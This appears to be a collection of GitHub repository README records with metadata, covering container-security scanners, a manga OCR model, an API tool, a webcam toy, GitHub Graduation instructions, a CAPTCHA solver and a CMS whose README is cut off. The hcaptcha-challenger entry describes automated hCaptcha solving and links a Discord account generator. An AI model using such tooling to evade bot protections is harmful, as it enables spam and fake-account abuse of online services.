| [veinmind-backdoor](plugins/go/veinmind-backdoor) | 扫描镜像中的后门 |
| [veinmind-history](plugins/python/veinmind-history) | 扫描镜像中的异常历史命令 |
| [veinmind-vuln](plugins/go/veinmind-vuln) | 扫描容器/镜像中的资产信息和漏洞 |
| [veinmind-webshell](plugins/go/veinmind-webshell) | 扫描镜像中的 Webshell |
| [veinmind-unsafe-mount](plugins/go/veinmind-unsafe-mount) | 扫描容器中的不安全挂载目录 |
| [veinmind-iac](plugins/go/veinmind-iac) | 扫描镜像/集群的IaC文件 |
| [veinmind-escape](plugins/go/veinmind-escape) | 扫描容器/镜像中的逃逸风险 |
| [veinmind-privilege-escalation](plugins/go/veinmind-privilege-escalation) | 扫描容器/镜像中的提权风险 |
| [veinmind-trace](plugins/go/veinmind-trace) | 扫描容器中的入侵痕迹 |
PS: 目前所有工具均已支持平行容器的方式运行
## 🧑💻 编写插件
可以通过 example 快速创建一个 veinmind-tools 插件, 具体查看 [veinmind-example](example/)
## ☁️ 云原生设施兼容性
| 名称 | 类别 | 是否兼容 |
|-------------------------------------------------------------|-------|------|
| [Jenkins](https://github.com/chaitin/veinmind-jenkins) | CI/CD | ✔️ |
| [Gitlab CI](https://veinmind.chaitin.com/docs/ci/gitlab/) | CI/CD | ✔️ |
| [Github Action](https://github.com/chaitin/veinmind-action) | CI/CD | ✔️ |
| DockerHub | 镜像仓库 | ✔️ |
| Docker Registry | 镜像仓库 | ✔️ |
| Harbor | 镜像仓库 | ✔️ |
| Docker | 容器运行时 | ✔️ |
| Containerd | 容器运行时 | ✔️ |
| Kubernetes | 集群 | ✔️ |
## 🛴 工作原理
![](docs/architecture.png)
## 🏘️ 联系我们
1. 您可以通过 GitHub Issue 直接进行 Bug 反馈和功能建议。
2. 扫描下方二维码可以通过添加问脉小助手,以加入问脉用户讨论群进行详细讨论
![](docs/veinmind-group-qrcode.png)
## ✨ CTStack
<img src="https://ctstack-oss.oss-cn-beijing.aliyuncs.com/CT%20Stack-2.png" width="30%" />
veinmind-tools 现已加入 [CTStack](https://stack.chaitin.com/tool/detail?id=3) 社区
## ✨ 404星链计划
<img src="https://github.com/knownsec/404StarLink-Project/raw/master/logo.png" width="30%">
veinmind-tools 现已加入 [404星链计划](https://github.com/knownsec/404StarLink)
## ✨ Star History <a name="star-history"></a>
<a href="https://github.com/chaitin/veinmind-tools/stargazers">
<img width="500" alt="Star History Chart" src="https://api.star-history.com/svg?repos=chaitin/veinmind-tools&type=Date">
</a> | veinmind-tools 是由长亭科技自研,基于 veinmind-sdk 打造的容器安全工具集 | docker,security,image-security,containerd,container-security,cloud-native,cloud-security | 54 | 21 | 229 | 372 | 16 | 32 | 6 |
kha-white/manga-ocr | # Manga OCR
Optical character recognition for Japanese text, with the main focus being Japanese manga.
It uses a custom end-to-end model built with Transformers' [Vision Encoder Decoder](https://huggingface.co/docs/transformers/model_doc/vision-encoder-decoder) framework.
Manga OCR can be used as a general purpose printed Japanese OCR, but its main goal was to provide a high quality
text recognition, robust against various scenarios specific to manga:
- both vertical and horizontal text
- text with furigana
- text overlaid on images
- wide variety of fonts and font styles
- low quality images
Unlike many OCR models, Manga OCR supports recognizing multi-line text in a single forward pass,
so that text bubbles found in manga can be processed at once, without splitting them into lines.
See also:
- [Poricom](https://github.com/bluaxees/Poricom), a GUI reader, which uses manga-ocr
- [mokuro](https://github.com/kha-white/mokuro), a tool, which uses manga-ocr to generate an HTML overlay for manga
- [Xelieu's guide](https://rentry.co/lazyXel), a comprehensive guide on setting up a reading and mining workflow with manga-ocr/mokuro (and many other useful tips)
- Development code, including code for training and synthetic data generation: [link](manga_ocr_dev)
- Description of synthetic data generation pipeline + examples of generated images: [link](manga_ocr_dev/synthetic_data_generator)
# Installation
You need Python 3.6 or newer. Please note, that the newest Python release might not be supported due to a PyTorch dependency, which often breaks with new Python releases and needs some time to catch up.
Refer to [PyTorch website](https://pytorch.org/get-started/locally/) for a list of supported Python versions.
Some users have reported problems with Python installed from Microsoft Store. If you see an error:
`ImportError: DLL load failed while importing fugashi: The specified module could not be found.`,
try installing Python from the [official site](https://www.python.org/downloads).
If you want to run with GPU, install PyTorch as described [here](https://pytorch.org/get-started/locally/#start-locally),
otherwise this step can be skipped.
## Troubleshooting
- `ImportError: DLL load failed while importing fugashi: The specified module could not be found.` - might be because of Python installed from Microsoft Store, try installing Python from the [official site](https://www.python.org/downloads)
- problem with installing `mecab-python3` on ARM architecture - try [this workaround](https://github.com/kha-white/manga-ocr/issues/16)
# Usage
## Python API
```python
from manga_ocr import MangaOcr
mocr = MangaOcr()
text = mocr('/path/to/img')
```
or
```python
import PIL.Image
from manga_ocr import MangaOcr
mocr = MangaOcr()
img = PIL.Image.open('/path/to/img')
text = mocr(img)
```
## Running in the background
Manga OCR can run in the background and process new images as they appear.
You might use a tool like [ShareX](https://getsharex.com/) or [Flameshot](https://flameshot.org/) to manually capture a region of the screen and let the
OCR read it either from the system clipboard, or a specified directory. By default, Manga OCR will write recognized text to clipboard,
from which it can be read by a dictionary like [Yomichan](https://github.com/FooSoft/yomichan).
Clipboard mode on Linux requires `wl-copy` for Wayland sessions or `xclip` for X11 sessions. You can find out which one your system needs by running `echo $XDG_SESSION_TYPE` in the terminal.
Your full setup for reading manga in Japanese with a dictionary might look like this:
capture region with ShareX -> write image to clipboard -> Manga OCR -> write text to clipboard -> Yomichan
https://user-images.githubusercontent.com/22717958/150238361-052b95d1-0152-485f-a441-48a957536239.mp4
- To read images from clipboard and write recognized texts to clipboard, run in command line:
```commandline
manga_ocr
```
- To read images from ShareX's screenshot folder, run in command line:
```commandline
manga_ocr "/path/to/sharex/screenshot/folder"
```
Note that when running in the clipboard scanning mode, any image that you copy to clipboard will be processed by OCR and replaced
by recognized text. If you want to be able to copy and paste images as usual, you should use the folder scanning mode instead
and define a separate task in ShareX just for OCR, which saves screenshots to some folder without copying them to clipboard.
When running for the first time, downloading the model (~400 MB) might take a few minutes.
The OCR is ready to use after `OCR ready` message appears in the logs.
- To see other options, run in command line:
```commandline
manga_ocr --help
```
If `manga_ocr` doesn't work, you might also try replacing it with `python -m manga_ocr`.
## Usage tips
- OCR supports multi-line text, but the longer the text, the more likely some errors are to occur.
If the recognition failed for some part of a longer text, you might try to run it on a smaller portion of the image.
- The model was trained specifically to handle manga well, but should do a decent job on other types of printed text,
such as novels or video games. It probably won't be able to handle handwritten text though.
- The model always attempts to recognize some text on the image, even if there is none.
Because it uses a transformer decoder (and therefore has some understanding of the Japanese language),
it might even "dream up" some realistically looking sentences! This shouldn't be a problem for most use cases,
but it might get improved in the next version.
# Examples
Here are some cherry-picked examples showing the capability of the model.
| image | Manga OCR result |
|----------------------|------------------|
| ![](assets/examples/00.jpg) | 素直にあやまるしか |
| ![](assets/examples/01.jpg) | 立川で見た〝穴〟の下の巨大な眼は: |
| ![](assets/examples/02.jpg) | 実戦剣術も一流です |
| ![](assets/examples/03.jpg) | 第30話重苦しい闇の奥で静かに呼吸づきながら |
| ![](assets/examples/04.jpg) | よかったじゃないわよ!何逃げてるのよ!!早くあいつを退治してよ! |
| ![](assets/examples/05.jpg) | ぎゃっ |
| ![](assets/examples/06.jpg) | ピンポーーン |
| ![](assets/examples/07.jpg) | LINK!私達7人の力でガノンの塔の結界をやぶります |
| ![](assets/examples/08.jpg) | ファイアパンチ |
| ![](assets/examples/09.jpg) | 少し黙っている |
| ![](assets/examples/10.jpg) | わかるかな〜? |
| ![](assets/examples/11.jpg) | 警察にも先生にも町中の人達に!! |
# Contact
For any inquiries, please feel free to contact me at kha-white@mail.com
# Acknowledgments
This project was done with the usage of:
- [Manga109-s](http://www.manga109.org/en/download_s.html) dataset
- [CC-100](https://data.statmt.org/cc-100/) dataset
| Optical character recognition for Japanese text, with the main focus being Japanese manga | ocr,japanese,manga,transformers,computer-vision,deep-learning,comics | 2 | 7 | 14 | 51 | 20 | 1 | 3 |
EsperoTech/yaade | <p align="center">
<img style="width:128px;min-width:128px;max-width:128px;height:auto" src="assets/YaadeIcon.png" alt="yaade-icon"/>
</p>
<h1 align="center"><span style="color:#48bb78">Yaade</span> - Yet Another API Development Environment</h1>
Yaade is an open-source, self-hosted, collaborative API development environment.
<img src="assets/dark-mode.png" alt="dark-mode-screenshot"/>
## 📚 Documentation
Visit [docs.yaade.io](https://docs.yaade.io).
## 🤔 Why did you develop Yaade?
I was looking for a self-hosted Postman alternative so that API collections can easily be shared between teammates. Even though popular solutions like <a href="https://hoppscotch.io/de/">Hoppscotch</a> exist, their self-hosted app does not come with authentication and relies on Firebase for persistency. Yaade is developed from the ground up with self-hosting and security in mind. That means sensitive information in API requests can safely be stored on your own server!
## 🌟 Features
1. Self-hosted: data never leaves your own server
2. Multi-user: manage users and their permissions
3. Persistent: even across container or server restarts
4. Easy single-file data import / export
5. Requests are executed on your machine so you can call localhost as well as remote servers
6. Collection and Request description (documentation) with Markdown
7. Request/Response scripts (for both collections and requests)
8. Most importantly: dark mode default
## ⚡ Install
To have the best experience with Yaade run the docker container on your server and install the browser extension on your local machine.
### 1. 🐋 Docker
```bash
docker volume create yaade
docker run -d --restart=always -p 9339:9339 -e YAADE_ADMIN_USERNAME=admin -v yaade:/app/data --name yaade esperotech/yaade:latest
```
The default password is `password`. After login go to ⚙️ > Account and change the password.
### 2. 🔧 Extension
Yaade uses a browser extension as a proxy to enable CORS requests. Install the extension using your browsers extension store. Currently only a chrome extension is available. You can find it <a href="https://chrome.google.com/webstore/detail/yaade-extension/mddoackclclnbkmofficmmepfnadolfa">here</a>. Then open it and input your server URL, eg. `https://yaade.example.com/`. From that point all requests originating from your Yaade browser tabs will be proxied through the extension.
## ⬆️ Upgrade
To upgrade the docker container with a new version, first stop the running container, pull the latest version and start a new container with the old volume.
```bash
docker rm -f yaade
docker pull esperotech/yaade:latest
docker run -d --restart=always -p 9339:9339 -e YAADE_ADMIN_USERNAME=admin -v yaade:/app/data --name yaade esperotech/yaade:latest
```
## 💾 Technology
1. SPA built with TypeScript, React and Vite.
2. Backend built with Kotlin.
3. H2 file-based database.
4. Browser extension with plain JavaScript.
## 🖥️ Local development
1. Install the required dependencies
- Java 11
- Kotlin
- Node >= 16
2. Clone the repository
3. Install the project specific dependencies
```bash
cd scripts/
chmod +x install.sh
./install.sh
```
4. Start the server on port 9339 using your IDE of choice (I use IntelliJ IDEA)
- you can also run it by using the jar file directly `$ java -jar server/build/libs/yaade-server-1.0-SNAPSHOT`
- note that you must set the environment variable `YAADE_ADMIN_USERNAME` to run
5. Start the vite dev server on port 9338
```bash
cd client/
npm run dev
```
6. Start the dev-proxy on port 9337
```bash
cd dev-proxy/
node index.js
```
7. Now open your browser and visit http://localhost:9337
## 🔨 Build
```bash
cd scripts/
chmod +x build.sh
./build.sh
```
## Screenshots
### 🌙 Dark mode
<img src="assets/dark-mode.png" alt="dark-mode-screenshot"/>
### ☀️ Light mode
<img src="assets/light-mode.png" alt="light-mode-screenshot"/>
### More Screenshots
<div style="width:100%;min-width:100%;display:flex;flex-wrap:wrap;justify-content:space-evenly">
<img style="width:48%;min-width:48%;max-width:48%;height:auto;margin-bottom:20px" src="assets/documentation.png" alt="documentation-screenshot"/>
<img style="width:48%;min-width:48%;max-width:48%;height:auto;margin-bottom:20px" src="assets/environments.png" alt="environments-screenshot"/>
<img style="width:48%;min-width:48%;max-width:48%;height:auto" src="assets/scripts.png" alt="scripts-screenshot"/>
<img style="width:48%;min-width:48%;max-width:48%;height:auto" src="assets/user-management.png" alt="user-management-screenshot"/>
</div>
## 🤝 How can I contribute?
Your contribution is very welcome! First open an issue about the topic you want to contribute on, eg. adding a new feature, bugfixing or refactoring. We will then discuss further details. Eventually, I will review your Pull Request and merge / release it.
| Yaade is an open-source, self-hosted, collaborative API development environment. | selfhosted,docker,kotlin,typescript,h2-database,api,postman,hoppscotch | 0 | 6 | 76 | 328 | 23 | 3 | 0 |
joschuck/matrix-webcam | # matrix-webcam
[![PyPI version](https://badge.fury.io/py/matrix-webcam.svg)](https://badge.fury.io/py/matrix-webcam)
[![License MIT](https://img.shields.io/github/license/joschuck/matrix-webcam.svg)](https://github.com/joschuck/matrix-webcam/blob/main/LICENSE)
[![issues](https://img.shields.io/github/issues/joschuck/matrix-webcam.svg)](https://github.com/joschuck/matrix-webcam/issues)
[![Code style: black](https://img.shields.io/badge/code%20style-black-000000.svg)](https://github.com/psf/black)
[![Checked with mypy](http://www.mypy-lang.org/static/mypy_badge.svg)](http://mypy-lang.org/)
This package displays your webcam video feed in the console.
Take your next video conference from within the matrix!
![matrix-webcam demo](https://raw.githubusercontent.com/joschuck/matrix-webcam/main/doc/matrix-webcam02.gif)
## Running it
Make sure you have Python and pip installed. Installation using pip:
$ pip install matrix-webcam # make sure it's in your PATH for it to run, alternatively use sudo
$ matrix-webcam
Installing and running it from source:
$ git clone https://github.com/joschuck/matrix-webcam.git
$ cd matrix-webcam
$ python -m pip install .
$ matrix-webcam
Tip: Shrink your font size, it will look even more hacky
usage: matrix-webcam [-h] [-l LETTERS] [-p PROBABILITY] [-u UPDATES_PER_SECOND]
options:
-h, --help show this help message and exit
-d DEVICE, --device DEVICE
Sets the index of the webcam if you have more than one webcam.
-l LETTERS, --letters LETTERS
The number of letters produced per update.
-p PROBABILITY, --probability PROBABILITY
1/p probability of a dispense point deactivating each tick.
-u UPDATES_PER_SECOND, --updates-per-second UPDATES_PER_SECOND
The number of updates to perform per second.
## Can I use this for Teams/Zoom/Skype etc.?
### For Windows/Mac Users
Yes! You can for example use [OBS Studio](https://obsproject.com/) ~~ together with the [Virtual Cam plugin](https://github.com/CatxFish/obs-virtual-cam) ~~ . Notice: obs-studio have officially provided virtual camera feature since version 26.0.0 , you can use it without installing this plugin.
Then all you need to do is select the virtual webcam in Teams/Zoom/Skype.
### For Linux Users
First we need to make sure you have the [v4l2loopback kernel module](https://github.com/umlaeute/v4l2loopback) to create V4L2 loopback devices setup.
This module allows you to create "virtual video devices".
Normal (v4l2) applications will read these devices as if they were ordinary video devices, but the video will not be read from e.g. a capture card but instead it is generated by another application.
It should be available in your distro's package manager.
Under Ubuntu install it using:
$ sudo apt install -y v4l2loopback-dkms v4l2loopback-utils
Now we need to create a virtual v4l2 device (exclusive_caps=1 and YUV2 conversion is required by Chromium for the device to be recognized):
$ sudo modprobe v4l2loopback devices=1 video_nr=42 card_label="Virtual Camera" exclusive_caps=1 max_buffers=2
Now we need to find the `xid` if the terminal window we will launch `matrix-webcam` in using
$ xdotool getactivewindow
79869947 # sample output
Optionally resize the terminal window to something reasonable from another terminal and then launch matrix webcam
$ wmctrl -i -r 79869947 -e 0,300,300,1280,720 # in another terminal (2)
Now launch matrix-webcam
$ matrix-webcam # in the terminal that was just resized
Now launch the virtual device in terminal (2) - you need [Gstreamer](https://gstreamer.freedesktop.org/documentation/installing/on-linux.html?gi-language=c) for this, check the link on how to install it
$ gst-launch-1.0 ximagesrc xid=79869947 ! video/x-raw,framerate=30/1 ! videoconvert ! video/x-raw,format=YUY2 ! v4l2sink device=/dev/video42
That's it, your webcam should show up in Chromium, Teams, etc.!
## Development
I'd recommend creating a new virtual environment (if you are under Ubuntu install it using `sudo apt install python3-venv` using
$ python3 -m venv venv/
$ source venv/bin/activate
Then install the dependencies using:
$ pip install -e .[dev,deploy]
Setup pre-commit, too:
$ pre-commit install
### TODO
* [x] Add Virtual webcam documentation for Linux/Gstreamer
* [x] add webcam selection
* [ ] Move to opencv-python-headless
* [ ] add tests
## License
This project is licensed under the MIT License (see the `LICENSE` file for details).
| Take your video conference from within the matrix. | null | 0 | 2 | 2 | 30 | 0 | 2 | 0 |
minad/org-modern | null | :unicorn: Modern Org Style | null | 0 | 8 | 31 | 255 | 0 | 4 | 0 |
education/GitHubGraduation-2022 | # GitHub Graduation-2022
### Available Translations 🗣
* [Arabic](./translations/README.ar.md)
* [Armenian](./translations/README.am.md)
* [Bangla](./translations/README.bn_bd.md)
* [中文](https://bit.ly/3kE3Ezc)
* [Español (España)](./translations/README.es-es.md)
* [Español (México)](./translations/README.es-mx.md)
* [Filipino](./translations/README.tl.md)
* [French](./translations/README.fr.md)
* [German](./translations/README.de.md)
* [Hindi](./translations/README.hi.md)
* [Indonesian](https://bit.ly/3yeTRrI)
* [Italian](./translations/README.it.md)
* [日本語](https://bit.ly/38TCVfm)
* [Korean](https://bit.ly/3MS4owN)
* [Malay](./translations/README.may.md)
* [Nepali](./translations/README.np.md)
* [Polski](https://bit.ly/38c411k)
* [Portuguese (Brazil)](https://bit.ly/3LI8kAc)
* [मराठी (Marathi)](./translations/README.mr.md)
* [Punjabi](./translations/README.pun.md)
* [Русский](https://bit.ly/3w7d7EL)
* [Somali](./translations/README.so.md)
* [ไทย](./translations/README.th.md)
* [Türkçe](./translations/README.tr.md)
* [Urdu](./translations/README.ur.md)
*Read the instructions in your language or [contribute a translation](translations/README.md)!*
## Sep 05, 2022
Re-Print GitHub Graduation card. We are aware that some of you have not received the card yet. We are opening a form for a reprint. We will keep it open until Sep 30.
Please only fill out the form if you have not received your card. [form](https://airtable.com/shrq4pObYbyaxwlpD)
## May 30, 2022
And that’s a wrap on the GitHub 2022 Yearbook ✨✅
Submissions to the repository are closed as of 12:00pm PT. Yearbook will be live on Wednesday June 8. Check back here for updates!
If you believe there has been a mistake with reviews, please let us know in [an Issue](https://github.com/education/GitHubGraduation-2022/issues). All Issues will be responded to before the event on June 11. Don’t forget to [save the date](#graduation-day-🎓) and follow us on [Twitch](https://www.twitch.tv/githubeducation) for notifications! See you on stage at graduation 👋
![2022-github-graduation-social-card-1](/assets/GHG_Blog_1.jpg)
This repository contains the yearbook for **GitHub Graduation 2022**. By issuing a pull request to this repository, you can request to be added to the GitHub Class of 2022.
The first 7,500 pull request successfully merged into the repository by May 27 will receive custom trading card, stickers, and letter in the mail.
## Privacy Notice 👀
Consider that all the information that you add to this repository will be publicly available.
- If you don't feel comfortable with displaying your full name, you can include a short name or nickname instead.
# Who can apply 📝
We invite any student who has graduated, or plans to graduate, in 2022 to apply to the yearbook. This includes bootcamps, code camps, high school graduates, Master's graduates, Ph. D. Graduates, etc.
The eligibility criteria are -
1. You have been verified as a student with the GitHub Student Developer Pack. Not yet a part of the Pack? [Apply here](https://education.github.com/discount_requests/student_application?utm_source=2022-06-11-GitHubGraduation).
2. You have not participated in a past GitHub Graduation event.
3. You identify as a graduate in the year 2022.
# How to join the Class of 2022
Here are two steps to join graduation and receive your custom trading card and stickers in the mail.
1. [Fill out the **shipping form**](https://airtable.com/shrVMo8ItH4wjsO9f)
⚠️ the form needs to be done before creating your Pull Request (PR) and does not guarantee participation in the event. Your PR must successfully merge into the repository and only the first 7,500 merged PRs will receive cards in the mail.
2. **Submit a pull request** with your profile information to join the Yearbook and be highlighted in the graduation event.
## 1. Fill out the shipping form.
Information submitted to [the swag shipment form](https://airtable.com/shrVMo8ItH4wjsO9f) is only used to ship trading cards for graduation. Submitting the form does not guarantee you will receive anything in the mail. Only the first 7,500 graduates to merge their Pull Request to the GitHub Yearbook will receive a shipment.
## 2. Add yourself to Yearbook 🏫
Replace `<YOUR-USERNAME>` with your GitHub username in this guide. Please note that the `<YOUR-USERNAME>` here is **Case Sensitive**. For Example, if your username is `MonaTheOctocat`, using anything other than it like `monatheoctocat` or `monaTheoctocat` will throw an error while submitting the Pull Request, make sure you're using the exact same case as your username in both the folder name and file name.
### First, create the folder \_data/YOUR-USERNAME/
Fork this repository, create a new folder inside the `_data` folder, and name it with your username. It should look something like this `_data/<YOUR-USERNAME>/`. Ex.
```
_data/MonaTheOctocat/
```
### Second, add your profile information
Create a markdown file in your folder following the convention `<YOUR-USERNAME>.md`. Ex.
```
_data/MonaTheOctocat/MonaTheOctocat.md
```
Copy the next template into your file, delete the boilerplate data and fill the information with yours.
```
---
name: FULLNAME-OR-NICKNAME # No longer than 28 characters
institution: INSTITUTION-NAME 🚩 # no longer than 58 characters
quote: YOUR-SENIOR-QUOTE # no longer than 100 characters, avoid using quotes(") to guarantee the format remains the same.
github_user: YOUR-GITHUB-USERNAME
---
```
_Do not use special characters in the template above._
### Third, submit your Pull Request
Go through the checklist on the pull request template to guarantee your submission is valid. The GitHub Education team will review your application, approve and merge your submission if everything is correct. Otherwise, you will get notified of the changes requested in the pull request comment section.
Having trouble submitting your Pull Request? [Ask for help in the GitHub Community](https://github.com/orgs/github-community/discussions/categories/github-education)!
# Graduation Stories 2022 👩🏫👨🏫 (optional)
Looking for more ways to participate in GitHub Graduation and the possibility of being featured on our social account?
We want to hear about the amazing things you achieved during your academic year and how GitHub helped you to accomplish your goals. Take a moment to record a video or write a message and share your story with us, your teachers, and your classmates.
[How to participate](https://drive.google.com/file/d/1AcgUKLXx6WIC5s4eanzOfj8EsiYHARrt/view?usp=sharing)
We are looking forward to hearing what you have to say, and we are grateful to have you as part of our community 💖
Remember: you have until May 30th to submit your story!
# A note on swag 🛍
The first 7,500 successfully merged PRs will receive a custom holographic developer trading card with their GitHub status in the mail.
What does this mean? We will use your public GitHub profile information to create a trading card. To ensure your trading card best reflects you, please make sure your GitHub profile picture and bio are up to date and what you would like shown on the card.
# Graduation Day 🎓
Don't forget to watch the livestream!
- 📆 Saturday, June 11, 2022
- ⏰ 9:00am PT | 16:00 GMT | 21:30 IST
- 📍 Follow the [GitHub Education Twitch Channel](https://twitch.tv/githubeducation) for notifications.
- 📎Add the event to your calender:
- [Google Calendar](https://calendar.google.com/calendar/render?action=TEMPLATE&dates=20220611T160000Z%2F20220611T180000Z&details=&location=https%3A%2F%2Fwww.twitch.tv%2Fgithubeducation&text=%F0%9F%8E%89%F0%9F%8E%8A%20GitHub%20Graduation%202022%20%F0%9F%8E%89%F0%9F%8E%8A)
- [Outlook Calendar](https://outlook.live.com/calendar/0/deeplink/compose?allday=false&body=&enddt=2022-06-11T18%3A00%3A00%2B00%3A00&location=https%3A%2F%2Fwww.twitch.tv%2Fgithubeducation&path=%2Fcalendar%2Faction%2Fcompose&rru=addevent&startdt=2022-06-11T16%3A00%3A00%2B00%3A00&subject=%F0%9F%8E%89%F0%9F%8E%8A%20GitHub%20Graduation%202022%20%F0%9F%8E%89%F0%9F%8E%8A)
- [Yahoo Calendar](https://calendar.yahoo.com/?desc=&dur=&et=20220611T180000Z&in_loc=https%3A%2F%2Fwww.twitch.tv%2Fgithubeducation&st=20220611T160000Z&title=%F0%9F%8E%89%F0%9F%8E%8A%20GitHub%20Graduation%202022%20%F0%9F%8E%89%F0%9F%8E%8A&v=60)
Questions about GitHub Graduation? Ask in the [GitHub Community Discussions](https://github.com/orgs/github-community/discussions/categories/github-education).
| Join the GitHub Graduation Yearbook and "walk the stage" on June 11. | null | 0 | 5,430 | 8,256 | 14,182 | 12 | 5 | 3 |
QIN2DIM/hcaptcha-challenger | <div align="center">
<h1> hCaptcha Challenger</h1>
<p>🚀 Gracefully face hCaptcha challenge with MoE(ONNX) embedded solution.</p>
<img src="https://img.shields.io/pypi/v/hcaptcha-challenger?style=flat-square&logo=python&logoColor=white">
<img src="https://img.shields.io/pypi/dw/hcaptcha-challenger?style=flat-square&logo=aiqfome&label=downloads%40PyPI">
<a href="https://github.com/QIN2DIM/hcaptcha-challenger/releases"><img src="https://img.shields.io/github/downloads/QIN2DIM/hcaptcha-challenger/model/total?style=flat-square&logo=github"></a>
<br>
<a href="https://discord.gg/m9ZRBTZvbr"><img alt="Discord" src="https://img.shields.io/discord/978108215499816980?style=social&logo=discord&label=echosec"></a>
<a href = "https://t.me/+Cn-KBOTCaWNmNGNh"><img src="https://img.shields.io/static/v1?style=social&logo=telegram&label=chat&message=studio" ></a>
<br>
<br>
</div>
![hcaptcha-challenger-demo](https://github.com/QIN2DIM/img_pool/blob/main/img/hcaptcha-challenger3.gif)
## Introduction
Does not rely on any Tampermonkey script.
Does not use any third-party anti-captcha services.
Just implement some interfaces to make `AI vs AI` possible.
## What's features
| Challenge Type | Pluggable Resource |
| --------------------------------------- | ------------------------------------------------------------ |
| `image_label_binary` | ResNet ONNX classification [#challenge](https://github.com/QIN2DIM/hcaptcha-challenger/issues?q=label%3A%22%F0%9F%94%A5+challenge%22+) |
| `image_label_area_select: point` | YOLOv8 ONNX detection [#588](https://github.com/QIN2DIM/hcaptcha-challenger/issues/588) |
| `image_label_area_select: bounding box` | YOLOv8 ONNX segmentation [#592](https://github.com/QIN2DIM/hcaptcha-challenger/issues/592) |
| `image_label_multiple_choice` | ViT ONNX zero-shot motion [#917](https://github.com/QIN2DIM/hcaptcha-challenger/issues/917) |
| Advanced Task | Pluggable Resource |
| --------------------------- | ------------------------------------------------------------ |
| `Rank.Strategy` | [#nested-model-zoo](https://github.com/QIN2DIM/hcaptcha-challenger/issues/797) |
| `self-supervised challenge` | [#CLIP-ViT](https://github.com/QIN2DIM/hcaptcha-challenger/issues/858) |
## Workflow
| Tasks | Resource |
| ----------------------------- | ------------------------------------------------------------ |
| `ci: sentinel` | [![hCAPTCHA Sentinel](https://github.com/QIN2DIM/hcaptcha-challenger/actions/workflows/sentinel.yaml/badge.svg?branch=main)](https://github.com/QIN2DIM/hcaptcha-challenger/actions/workflows/sentinel.yaml) |
| `ci: collector` | [![hCAPTCHA Collector](https://github.com/QIN2DIM/hcaptcha-challenger/actions/workflows/collector.yaml/badge.svg)](https://github.com/QIN2DIM/hcaptcha-challenger/actions/workflows/collector.yaml) |
| `datasets: VCS, annoate` | [#roboflow](https://app.roboflow.com/), [#model-factory](https://github.com/beiyuouo/hcaptcha-model-factory) |
| `model: ResNet - train / val` | [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/captcha-challenger/hcaptcha-model-factory/blob/main/automation/roboflow_resnet.ipynb) |
| `model: YOLOv8 - train / val` | [![Open In Colab](https://colab.research.google.com/assets/colab-badge.svg)](https://colab.research.google.com/github/QIN2DIM/hcaptcha-challenger/blob/main/automation/roboflow_yolov8.ipynb) |
| `model: upload, upgrade` | [#objects](https://github.com/QIN2DIM/hcaptcha-challenger/tree/main/src), [#modelhub](https://github.com/QIN2DIM/hcaptcha-challenger/releases/tag/model) |
| `datasets: public, archive` | [#roboflow-universe](https://universe.roboflow.com/qin2dim/), [#captcha-datasets](https://github.com/captcha-challenger/hcaptcha-whistleblower) |
## Contributors
I would like to express my sincere gratitude to all the contributors.
[![](https://opencollective.com/hcaptcha-challenger/contributors.svg?width=890&button=false)](https://github.com/QIN2DIM/hcaptcha-challenger/graphs/contributors)
## What's next
- [Dislock](https://github.com/Vinyzu/DiscordGenerator), the most advanced Discord Browser Generator. Powered by hCaptcha Solving AI.
- [undetected-playwright](https://github.com/QIN2DIM/undetected-playwright), stash the fingerprint of playwright-based web agents.
- [epic-awesome-gamer](https://github.com/QIN2DIM/epic-awesome-gamer), gracefully claim weekly free games from Epic Store.
## Reference
- [microsoft/playwright-python](https://github.com/microsoft/playwright-python)
- [ultrafunkamsterdam/undetected-chromedriver](https://github.com/ultrafunkamsterdam/undetected-chromedriver)
- hCaptcha challenge template site [@maximedrn](https://github.com/maximedrn/hcaptcha-solver-python-selenium)
| 🥂 Gracefully face hCaptcha challenge with MoE(ONNX) embedded solution. | yolov5,hcaptcha,opencv-python,onnx-models,hcaptcha-solver,solver,onnx,yolo,onnxruntime,playwright | 1 | 16 | 117 | 885 | 34 | 4 | 4 |
Thecosy/IceCMS | <p align="center">
<a href="https://www.icecmspro.com" target="_blank">
<img alt="logo" style="height: 120px" src="https://res.cloudinary.com/dxl1idlr5/image/upload/v1700470902/logo_s4maqv.svg"/>
</a>
</p>
<p align="center">
<img style="padding: 4px;" alt="Label" src="https://img.shields.io/badge/JDK-1.8+-orange">
<img style="padding: 4px;" alt="Label" src="https://img.shields.io/badge/SpringBoot-2.2.7.RELEASE-brightgreen">
<img style="padding: 4px;" alt="Label" src="https://img.shields.io/badge/MyBatis-3.5.5-red">
<img style="padding: 4px;" alt="Label" src="https://img.shields.io/badge/Vue-2.6.11-brightgreen">
<img style="padding: 4px;" alt="Label" src="https://img.shields.io/badge/license-MIT-blue">
<img style="padding: 4px;" alt="Label" src="https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2FNaccl%2FNBlog&count_bg=%2344CC11&title_bg=%23555555&icon=notist.svg&icon_color=%231296DB&title=hits&edge_flat=false">
</p>
## 简介
基于 Spring Boot + Vue 前后端分离的内容管理系统
演示: ([www.icecmspro.com](https://www.icecmspro.com/))
后台:([admin.icecmspro.com](https://admin.icecmspro.com/))
官网: ([www.icecms.cn](https://doc.icecms.cn))
IceCMS 文档: ([http://www.icecms.cn](https://www.icecms.cn))
内容管理:文章、图片、资源等多种类型的内容管理;
栏目管理:自定义栏目,对栏目进行增删改查等操作;
用户管理:管理后台用户,包括添加、删除、修改、权限分配等功能;
数据统计:对网站访问量、用户行为等进行统计分析;
模板管理:自定义网站模板,方便快速搭建网站;
SEO优化:网站标题、关键词、描述等SEO优化功能。
## 预览地址:
前台:[www.icecmspro.com](https://www.icecmspro.com)
uniapp移动端:[uni.icecmspro.com](https://m.www.icecmspro.com)
后台:[admin.icecmspro.com](https://admin.icecmspro.com) 账号`admin`密码`admin123`
API文档:[api.icecmspro.com/doc.html](https://api.icecmspro.com/doc.html)
## PC端
<div class = "half">
<img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1689828922/63d19ee5a6c55_xu7ex3.png" width = “50%”><img alt="describe" src = "https://res.cloudinary.com/dxl1idlr5/image/upload/v1689829049/63d19ee456c4b_fhibyf.png" width = “50%”>
</div>
<div class = "half">
